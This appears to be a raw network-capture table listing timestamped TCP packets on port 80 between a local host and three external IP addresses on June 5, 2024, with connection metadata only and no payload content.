Jun 5, 2024 18:28:05.971216917 CEST	80	49725	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:05.971297979 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:06.242691994 CEST	49725	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:07.262351990 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:07.267328024 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:07.270416975 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:07.274287939 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:07.279122114 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.337946892 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.337981939 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338010073 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338021040 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338032007 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338042974 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338042021 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.338056087 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338069916 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338080883 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338093996 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.338113070 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.338161945 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.342984915 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.342997074 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.343009949 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.343112946 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.562469006 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562541962 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562558889 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562580109 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562695980 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.562695980 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.562740088 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562752008 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562803984 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.562921047 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562952995 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562967062 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562979937 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.562993050 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.563009024 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.563014030 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.563014030 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.563050032 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.563868999 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.563895941 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.563910007 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.564234018 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.617551088 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.768667936 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:08.772691965 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.776521921 CEST	49726	80	192.168.2.7	13.228.81.39
Jun 5, 2024 18:28:08.781425953 CEST	80	49726	13.228.81.39	192.168.2.7
Jun 5, 2024 18:28:21.904014111 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:21.908917904 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:21.908981085 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:21.911345005 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:21.916220903 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.609879017 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.609950066 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.609998941 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610024929 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.610032082 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610064983 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610097885 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610105038 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.610148907 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610181093 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610213995 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610223055 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.610223055 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.610249996 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.610297918 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.615250111 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.615283012 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.615318060 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.615423918 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.664522886 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:22.726655006 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.726703882 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.726741076 CEST	80	49727	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:22.727262974 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:23.418354034 CEST	49727	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:24.433372974 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:24.438551903 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:24.438632965 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:24.440782070 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:24.445647955 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542156935 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542232037 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542237043 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542325974 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542331934 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542342901 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542362928 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:25.542386055 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542392015 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542406082 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542449951 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.542479038 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:25.546442032 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:25.547322035 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.547363043 CEST	80	49728	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:25.547451973 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:25.945956945 CEST	49728	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:26.966485023 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:26.971447945 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:26.974556923 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:26.978364944 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:26.986032963 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:26.986099958 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782365084 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782378912 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782439947 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.782807112 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782883883 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782902956 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782915115 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782922029 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.782932997 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782946110 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782953978 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.782954931 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782968998 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.782988071 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.783015013 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.787244081 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.787285089 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.787305117 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.787324905 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.787657022 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.787697077 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:27.899194002 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.899208069 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:27.899288893 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:28.231966972 CEST	80	49729	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:28.232024908 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:28.492815018 CEST	49729	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:29.518374920 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:29.523353100 CEST	80	49730	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:29.523467064 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:29.526376963 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:29.531512976 CEST	80	49730	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:31.295506954 CEST	80	49730	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:31.338397026 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:31.345127106 CEST	80	49730	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:31.345276117 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:31.350388050 CEST	49730	80	192.168.2.7	162.0.213.94
Jun 5, 2024 18:28:31.355294943 CEST	80	49730	162.0.213.94	192.168.2.7
Jun 5, 2024 18:28:35.296617031 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:35.301631927 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:35.301935911 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:35.306394100 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:35.311264992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122766018 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122792006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122802973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122838020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122844934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122853994 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.122899055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.122899055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.122914076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122920990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122927904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122934103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122941971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.122952938 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.122967005 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.122982979 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.128164053 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.128170967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.128182888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.128233910 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.128263950 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.240277052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240330935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240336895 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240348101 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240369081 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.240405083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.240608931 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240658998 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.240672112 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240678072 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240689039 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.240720034 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.240736961 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.241225004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.241230965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.241242886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.241278887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.241281986 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.241286039 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.241309881 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.241336107 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.241965055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242007017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242026091 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242032051 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242043972 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.242117882 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.242563963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242675066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242686033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242692947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242702961 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.242743015 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.242769003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.243455887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.243511915 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358022928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358031988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358056068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358102083 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358109951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358115911 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358128071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358133078 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358163118 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358450890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358455896 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358506918 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358551979 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358584881 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358591080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358638048 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358680964 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358686924 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358697891 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358702898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358712912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.358728886 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358743906 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.358774900 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.359513044 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.359571934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.359576941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.359581947 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.359594107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.359599113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.359653950 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.360105991 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360147953 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360153913 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360198975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.360198975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.360219955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360225916 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360230923 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360240936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360246897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.360258102 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.360276937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.361046076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361131907 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.361157894 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361170053 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361181021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361186028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361191988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361196995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361202002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.361210108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.361238003 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475625038 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475647926 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475682974 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475706100 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475709915 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475740910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475742102 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475754023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475768089 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.475786924 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475824118 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.475996017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476006985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476016998 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476044893 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476068020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476073027 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476079941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476097107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476098061 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476108074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476114035 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476133108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476403952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476430893 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476445913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476469994 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476531029 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476563931 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476596117 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476607084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476617098 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476634979 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476659060 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476757050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476818085 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476876020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476886034 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476898909 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476905107 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476907969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.476919889 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.476958990 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477256060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477293015 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477307081 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477313042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477323055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477340937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477370977 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477524996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477535963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477545977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477555990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477565050 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477591991 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477632046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477652073 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477663040 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477664948 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477673054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477684021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477694035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477694988 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477705002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.477734089 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.477750063 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.478318930 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.478358030 CEST	49731	80	192.168.2.7	2.56.245.142
